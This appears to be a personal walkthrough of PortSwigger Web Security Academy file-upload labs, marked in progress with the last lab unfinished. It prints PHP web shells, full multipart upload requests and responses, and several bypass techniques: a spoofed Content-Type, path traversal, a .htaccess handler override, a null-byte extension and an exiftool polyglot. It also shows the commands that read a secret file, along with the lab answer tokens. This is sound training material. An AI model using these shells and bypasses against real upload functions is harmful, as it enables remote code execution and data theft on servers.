IN PROGRESS: WebSecurityAcademy (PortSwigger) – File upload vulnerabilities

Walk-through of the File upload vulnerabilities lab on PortSwigger Web Security Academy.

Apprentice – Remote code execution via web shell upload
Apprentice – Web shell upload via Content-Type restriction bypass
Practitioner – Web shell upload via path traversal
Practitioner – Web shell upload via extension blacklist bypass
Practitioner – Web shell upload via obfuscated file extension
Practitioner – Remote code execution via polyglot web shell upload
Expert – Web shell upload via race condition

Apprentice – Remote code execution via web shell upload

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret.

Create a file webshell.php with the following content:

<?php passthru($_REQUEST[c]); ?>

Click on My account and enter provided credentials (wiener:peter). Click on Choose File to update the Avatar image and select webshell.php. Click on Upload.

Inspect the page. the Avatar image is located at /files/avatars/webshell.php.

https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret

We obtain the secret file. Click Submit the solution.

MtOzuGqwEbNd6BMIIUbmwk3S0nhIXiBK

Apprentice – Web shell upload via Content-Type restriction bypass

Access the lab

To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

Create a file webshell.php with the following content:

<?php passthru($_REQUEST[c]); ?>

Click on My account and enter provided credentials (wiener:peter).
Click on Choose File to update the Avatar image and select webshell.php.
Click on Upload. We get an error:

HTTP/1.1 403 Forbidden
Date: Tue, 07 Feb 2023 14:27:06 GMT
Server: Apache/2.4.41 (Ubuntu)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 238

Sorry, file type application/octet-stream is not allowed
        Only image/jpeg and image/png are allowed
Sorry, there was an error uploading your file.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

Send the request to the Repeater module. Change Content-Type from “application/octet-stream” to “image/jpeg”.

POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=---------------------------8917356433747280746683964460
Content-Length: 508
...

-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="avatar"; filename="webshell.php"
Content-Type: image/jpeg

<?php passthru($_REQUEST[c]); ?>
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="user"

wiener
-----------------------------8917356433747280746683964460
Content-Disposition: form-data; name="csrf"

n0bXCxETqbab4iyX7uIk4rUSlrBrpxoJ
-----------------------------8917356433747280746683964460--

Inspect the page. the Avatar image is located at /files/avatars/webshell.php.

https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret

GET /files/avatars/webshell.php?c=cat%20/home/carlos/secret HTTP/1.1
...

We obtain the secret file. Click Submit the solution.

RkFG4FCwk8mziFigQkqrNkhnab3JBy5i

Practitioner – Web shell upload via path traversal

Access the lab

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability. To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

💡 Web servers often use the filename field in multipart/form-data requests to determine the name and location where the file should be saved.

Create a file webshell.php with the following content:

<?php passthru($_REQUEST[c]); ?>

Click on My account and enter provided credentials (wiener:peter).
Click on Choose File to update the Avatar image and select webshell.php.
Click on Upload.
Inspect the page. the Avatar image is located at /files/avatars/webshell.php. However, the file is not executed.
Send the request to the Repeater and replace the filename by “../webshell.php” to upload it in the files directory. It give a message “The file avatars/webshell.php has been uploaded.”, which is not the expected result.
URL-encode the / (%2f) and send the request. The webshell will be uploaded in the files directory.

POST /my-account/avatar HTTP/1.1
...
Cookie: session=RckXGmQg72YWAtC3xrRXVI97QhkyUHw0
Content-Length: 459
...

------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="avatar"; filename="..%2fwebshell.php"
Content-Type: application/octet-stream

<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundary9h8yeuTfegvyCX2q
Content-Disposition: form-data; name="csrf"

aHL8pOr7znjCUsw0IsHieWdJptbVrGve
------WebKitFormBoundary9h8yeuTfegvyCX2q--

HTTP/1.1 200 OK
Date: Wed, 15 Feb 2023 20:02:16 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 136

The file avatars/../webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

Access the webshell to read the secret file.

https://<LAB ID>.web-security-academy.net/files/webshell.php?c=cat%20/home/carlos/secret

We obtain the secret file. Click Submit the solution.

LoIGEFW9wmt2ArqgrRAkDy4IwsU0xiYC

Practitioner – Web shell upload via extension blacklist bypass

Access the lab

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed due to a fundamental flaw in the configuration of this blacklist. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

Create a file webshell.php with the following content:

<?php passthru($_REQUEST[c]); ?>

Click on My account and enter provided credentials (wiener:peter).
Click on Choose File to update the Avatar image and select webshell.php.
Click on Upload. We get this message:

Sorry, php files are not allowed Sorry, there was an error uploading your file.

Create a file .htaccess locally.

AddType application/x-httpd-php .l33t

Upload the file.
Change the value of the filename parameter to “.htaccess”.
Change the value of the Content-Type header to “text/plain”.

POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXQ9bQMD0l3oFDfao
...

------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="avatar"; filename=".htaccess"
Content-Type: text/plain

AddType application/x-httpd-php .l33t
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryXQ9bQMD0l3oFDfao
Content-Disposition: form-data; name="csrf"

jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryXQ9bQMD0l3oFDfao--

Upload the webshell (.l33t).

POST /my-account/avatar HTTP/1.1
...
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqQBNC96c1YVuBBsI
...

------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="avatar"; filename="webshell.l33t"
Content-Type: application/octet-stream

<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundaryqQBNC96c1YVuBBsI
Content-Disposition: form-data; name="csrf"

jvgJUsOEhjvh1Y6dF7gf8OCKz9Dgw9YB
------WebKitFormBoundaryqQBNC96c1YVuBBsI--

HTTP/1.1 200 OK
Date: Fri, 17 Feb 2023 15:09:23 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 134

The file avatars/webshell.l33t has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

Access the webshell to read the secret file.

https://<LAB ID>.web-security-academy.net/files/avatars/webshell.l33t?c=cat%20/home/carlos/secret

We obtain the secret file. Click Submit the solution.

xPRopdAaKALblqmCEB3uIG0n9TbXTytU

Practitioner – Web shell upload via obfuscated file extension

Access the lab

This lab contains a vulnerable image upload function. Certain file extensions are blacklisted, but this defense can be bypassed using a classic obfuscation technique. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

Create a file webshell.php with the following content:

<?php passthru($_REQUEST[c]); ?>

Click on My account and enter provided credentials (wiener:peter).
Click on Choose File to update the Avatar image and select webshell.php.
Click on Upload. We get this message:

Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.

Send the request to the Repeater. Change the filename to “webshell.php%00.jpg”.

POST /my-account/avatar HTTP/1.1
...

------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="avatar"; filename="webshell.php%00.jpg"
Content-Type: application/octet-stream

<?php passthru($_REQUEST[c]); ?>
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="user"

wiener
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC
Content-Disposition: form-data; name="csrf"

1JgfDFdUXGnu1TpJPgM1QX34z2LjcmRn
------WebKitFormBoundary8ZHnoZ9WEPCW6MbC--

HTTP/1.1 200 OK
Date: Mon, 20 Feb 2023 14:20:40 GMT
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
X-Frame-Options: SAMEORIGIN
Content-Length: 133

The file avatars/webshell.php has been uploaded.<p><a href="/my-account" title="Return to previous page">« Back to My Account</a></p>

Access the webshell to read the secret file.

https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?c=cat%20/home/carlos/secret

We obtain the secret file. Click Submit the solution.

SM1k317Urntufx4jJ3oJSU6mr46qfBfE

Practitioner – Remote code execution via polyglot web shell upload

Access the lab

This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

Download any image and insert a PHP webshell payload using Exiftool.

wget -O webshell.jpg http://placekitten.com/100/100

exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' webshell.jpg -o webshell.php

Click on My account and enter provided credentials (wiener:peter).
Click on Choose File to update the Avatar image and select webshell.php.
Access the webshell to read the secret file.

https://<LAB ID>.web-security-academy.net/files/avatars/webshell.php?cmd=cat%20/home/carlos/secret

We obtain the secret file. Click Submit the solution.

Xf7lGsMYGhNbZk9NBBHL4jchA89IL0He

Expert – Web shell upload via race condition

Access the lab

This lab contains a vulnerable image upload function. Although it performs robust validation on any files that are uploaded, it is possible to bypass this validation entirely by exploiting a race condition in the way it processes them. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.

❗ NOT COMPLETED